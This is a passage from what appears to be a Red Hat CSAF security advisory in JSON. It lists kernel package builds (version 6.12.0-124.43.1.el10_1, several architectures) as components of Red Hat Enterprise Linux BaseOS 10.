"name": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
